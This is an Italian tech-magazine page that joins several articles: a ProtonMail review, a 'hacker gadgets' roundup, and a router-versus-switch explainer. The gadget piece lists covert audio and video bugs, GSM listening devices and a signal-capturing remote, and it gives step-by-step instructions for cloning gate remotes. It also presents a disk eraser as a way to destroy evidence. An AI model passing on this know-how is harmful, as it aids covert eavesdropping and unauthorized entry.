Un approccio diverso, ma interessante per il suo ampio respiro, al tema della protezione della posta è quello adottato da ProtonMail. Si tratta di un servizio di posta elettronica privata che si serve della crittografia end-to-end Open Source e della crittografia ad accesso zero per proteggere la posta da ogni genere di violazione. Offre funzioni anti-tracking bloccando automaticamente i pixel di tracciamento e nascondendo il vostro indirizzo IP e permette di creare più indirizzi collegati allo stesso account. Utilizza anche PhishGuard per offrire una tutela dal phishing segnalando email potenzialmente falsificate nella posta in arrivo, ma il suo principale punto di forza è la crittazione dei messaggi e dei contatti. Al servizio si accede attraverso app Web, per Android e per iOS ed è anche disponibile Proton Mail Bridge per aggiungere la crittografia end-to-end ad applicazioni come Outlook e Thunderbird. La versione gratuita del servizio offre la cifratura della posta elettronica, un indirizzo email gratuito e fino a 150 messaggi al giorno cifrati, oltre ad altri servizi del pacchetto Proton. ProtonMail non è infatti più un prodotto singolo ma fa parte di un ecosistema per la tutela dei dati dell’utente che, nelle parole del produttore, “è garantita da crittografia avanzata, codice Open Source e leggi svizzere sulla privacy”. Ci sono poi le versioni a pagamento con più indirizzi email e domini personalizzati.


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

I gadget preferiti degli hacker

La valigetta del pirata contiene dispositivi hi-tech piccoli, anonimi e potenti, facilmente acquistabili anche su Amazon

Avatar

Pubblicato

il

Con il termine hacker viene spesso indicato un esperto di informatica, di programmazione e di sicurezza in grado di intrufolarsi illegalmente nelle reti di computer altrui. In realtà occorre classificare gli hacker in (almeno) due categorie. Esistono gli hacker buoni, i cosiddetti white hat, che aiutano le aziende a rimuovere virus o verificare reti alla ricerca di vulnerabilità, e quelli cattivi, black hat, che sfruttano le loro conoscenze a fini tutt’altro che etici (rubare dati personali, foto o video compromettenti per rivenderle al miglior offerente, svuotare conti correnti altrui e in genere arricchirsi con azioni non proprio legali).

Gadget dalle mille potenzialità

Per scoprire le vulnerabilità nei sistemi di comunicazione e raggiungere, così, i propri scopi sia gli hacker buoni che quelli cattivi hanno ovviamente bisogno di software specifici, ma non solo: esistono numerosi gadget e accessori che possono essere utilizzati o assieme a un computer o in modalità “stand alone” (non serve un PC per farli funzionare). In queste pagine analizzeremo dunque alcuni dispositivi che non mancano mai nella dotazione del perfetto hacker. Si va dalla chiavetta USB in grado di catturare l’audio ambientale al telecomando che intercetta qualsiasi segnale inviato a un dispositivo elettronico. Osservateli prestando molta attenzione e la prossima volta che tornate in ufficio, prima di digitare la password del vostro account o prima di accedere al vostro home banking, controllate che non ci siano strani accessori collegati al computer… e nel dubbio, desistete!

 

 

CLONA TELECOMANDO

Grazie a questo piccolo oggetto, l’hacker potrà clonare il telecomando (o i telecomandi) dei cancelli automatici semplicemente avvicinandoli tra loro. Il dispositivo può memorizzare fino a quattro impulsi diversi. Il suo funzionamento è abbastanza semplice come illustrato di seguito.

Quanto costa: 10,00 € (3 pezzi)

Sito Internet: http://bit.ly/clonetelecomando

1 Prima di usare il dispositivo, l’hacker resetta il “clonatore” tenendo premuti i pulsanti A e B contemporaneamente fino a quando il LED non lampeggia per tre volte. Rilascia il pulsante B per poi premerlo per altre tre volte: lampeggerà ancora il LED. A quel punto rilascia anche il pulsante A. Se il reset è andato buon fine, alla pressione de i vari pulsanti, il LED posto sul telecomando non si accenderà.

 

2 L’hacker adesso avvicina il telecomando da clonare e tiene premuto il pulsante contemporaneamente a quello del telecomando clonato. Attende che il LED lampeggi per tre volte e poi rilascia i pulsanti di entrambi i telecomandi per completare la “clonazione”.

 

MICROSPIA AUDIO

Un aspetto importante dell’attività dei pirati è il cosiddetto social hacking. Ascoltare ciò che la vittima dice è un’ottima idea se si intendono carpire informazioni importanti per scoprire le sue password. Il Lightrec-mini è una chiavetta USB con una particolarità: contiene una cimice in grado di registrare fino a 140 ore di conversazione, attivandosi automaticamente quando le persone parlano. Ovviamente funziona anche come normale chiavetta USB.

Quanto costa: 49,95 €

Sito Internethttps://www.short.tips/url/lr-mini

 

REMOTE CONTROL

Questo è un vero e proprio telecomando da hacker che intercetta qualsiasi segnale inviato a un dispositivo elettronico che sia un condizionatore, un televisore e persino l’antifurto dell’automobile. Una volta memorizzati i codici si potranno controllare i dispositivi intercettati direttamente dallo smartphone. Il suo funzionamento è molto semplice. L’hacker per prima cosa installa l’apposita app mobile e al termine l’avvia per rilevare automaticamente sia la rete che il remote control. A questo punto, procede con la configurazione del telecomando e inizia ad aggiungere i vari dispositivi individuati.

Quanto costa: 48,00 €

Sito Internet:  https://www.short.tips/url/blrm-4

 

DISK ERASER

Può capitare che un hacker si senta braccato dalle forze dell’ordine e decida di eliminare tutte le prove contenute sui propri hard disk. In questi casi ricorre a un gadget come il Wiebetech Drive Erazer. Si tratta di un dispositivo in grado di cancellare in modo sicuro sia dischi Serial ATA che Parallel ATA senza la necessità di collegarli a un computer.

Quanto costa: 276,00 €

Sito Internet: http://bit.ly/hackdriveerazer

 

MICRO REGISTRATORE SPIA

Dalle dimensioni contenute (12.4 x 11.1 x 5.6cm) e dal peso irrisorio (194g), è una microspia con scheda GSM: basta chiamare per ascoltare ciò che accade attorno. Il dispositivo richiama al rilevamento di un rumore e trasmette suoni chiari in un raggio di circa 15 metri. Registra con un’autonomia di 72ore. Include il GPS.

Quanto costa: 229,00 €

Sito Internet: www.short.tips/url/gsmspy2

 

TI SPIO DALLO SMARTWATCH 

Questo gadget nasconde una serie di pulsanti e una fotocamera HD con una risoluzione di 1080P e un registratore di alta qualità. Ha le funzionalità classiche degli orologi smart, come il contapassi e il contatore calorie. Si collega via Bluetooth 4.0 BLE su iOS e Android.

Quanto costa: 149,00 €

Sito Internet: www.short.tips/url/watchspy2

BASTA CHIAMARE E REGISTRA 

Questa piccola scatoletta nasconde un sofisticato registratore audio con scheda GSM. Il dispositivo viene attivato semplicemente chiamando il numero della scheda.

Quanto costa: 25,00 €

Sito Internet: https://www.short.tips/url/gsmspy1

 

MOSTRA ANCHE L’ORA

Sembra un braccialetto fitness, ma nasconde un registrare video e audio. Include una scheda SD da 32GB. Il dispositivo dispone di una funzione di registrazione in loop che sovrascrive i video più vecchi non appena lo spazio su scheda si esaurisce.

Quanto costa: 46,00 €

Sito Internet: https://www.short.tips/url/watchspy1

IDEALE PER PROTEGGERE I GADGET

Pronti a realizzare la nostra cassetta degli attrezzi? Sì? Bene, allora il primo passo è acquistare una vera e propria custodia per gli strumenti presentati in queste pagine. Qualcosa che sia rigido, sicuro e facilmente trasportabile. Una soluzione potrebbe essere KESSER che, nata per macchine fotografie e obiettivi, si adatterebbe perfettamente al nostro scopo. È compatta, piena di schiuma protettiva, impermeabile ed ermetica. E costa solo 45,00 euro.

Quanto costa: 45,00 €

Sito Internet: https://www.short.tips/url/valigiafotocamera


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

A cosa servono i router e gli switch e quali sono le differenze

Avatar

Pubblicato

il

Nella rete di computer, ci sono diversi dispositivi che consentono ai dati di essere trasmessi da un punto all’altro. Due di questi dispositivi sono switch e router. Mentre entrambi i dispositivi sono utilizzati per connettere diversi dispositivi di rete, hanno scopi diversi e sono utilizzati in contesti diversi.

Per acquistare router, switch e altri apparati per migliorare la tua sicurezza ti consigliamo di comprare su ollo shop, un e-commerce specializzata nel mondo dell’elettronica che offre prodotti di ottima qualità a prezzi molto vantaggiosi.

Nelle prossime righe andremo a vedere più nello specifico cosa sono i router e gli switch e quali sono le principali differenze tra loro.

Che cos’è uno Switch

Uno switch è un dispositivo di rete che connette diversi dispositivi sulla stessa rete locale (LAN) e consente la comunicazione tra di loro. Questo dispositivo è progettato per gestire una grande quantità di traffico dati sulla rete LAN, in modo che i dispositivi sulla stessa rete possano comunicare tra loro in modo efficiente e veloce.

Uno switch funziona inviando dati attraverso la rete LAN a destinazioni specifiche, in base all’indirizzo MAC (Media Access Control) del dispositivo di destinazione. L’indirizzo MAC è un identificatore univoco assegnato a ogni dispositivo di rete. Quando i dati vengono inviati attraverso la rete, lo switch cerca l’indirizzo MAC del dispositivo di destinazione e invia i dati solo a quel dispositivo. Ciò significa che solo il dispositivo di destinazione riceverà i dati, riducendo così la congestione di rete e migliorando le prestazioni.

Uno switch è in grado di gestire il traffico di rete LAN, ma non è in grado di instradare il traffico di rete su diverse reti. In altre parole, uno switch è limitato all’ambito di una singola rete LAN.

Che cos’è un Router

Un router è un dispositivo di rete che connette diverse reti e instrada il traffico di rete tra di esse. Un router è progettato per gestire il traffico di rete su diverse reti, comprese le reti LAN e WAN (Wide Area Network). Questo dispositivo è in grado di determinare il percorso più efficiente per instradare i dati sulla rete e di farlo in modo sicuro.

Un router funziona esaminando gli indirizzi IP dei dati in transito e inviandoli al percorso appropriato sulla rete. Gli indirizzi IP sono gli identificatori univoci assegnati a ogni dispositivo di rete sulla rete Internet. Quando un dispositivo sulla rete desidera inviare dati a un altro dispositivo su una rete diversa, i dati vengono inviati al router. Il router esamina l’indirizzo IP di destinazione e invia i dati al percorso appropriato sulla rete. Ciò significa che il router è in grado di gestire il traffico di rete su diverse reti e di instradare i dati in modo sicuro e efficiente.

Quali sono le differenze tra switch e router

Le principali differenze tra switch e router sono legate alle loro funzioni e alla loro capacità di gestire il traffico di rete. Uno switch è progettato per gestire il traffico di rete all’interno di una singola rete locale, ovvero una LAN (Local Area Network), e connettere diversi dispositivi tra di loro. Un router, d’altra parte, è progettato per gestire il traffico di rete tra diverse reti, inclusi i collegamenti tra reti locali e la connessione a Internet.

In termini di come instradano i dati, uno switch utilizza l’indirizzo MAC (Media Access Control) dei dispositivi di rete per inviare i dati alla giusta destinazione. Ciò significa che gli switch inviano i dati solo ai dispositivi che devono riceverli, riducendo la congestione di rete e migliorando le prestazioni complessive. Un router, invece, instrada i dati in base all’indirizzo IP (Internet Protocol) di destinazione. Questo significa che i router sono in grado di determinare il percorso migliore per inviare i dati su diverse reti, che possono includere molteplici punti intermedi tra la sorgente e la destinazione.


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Trending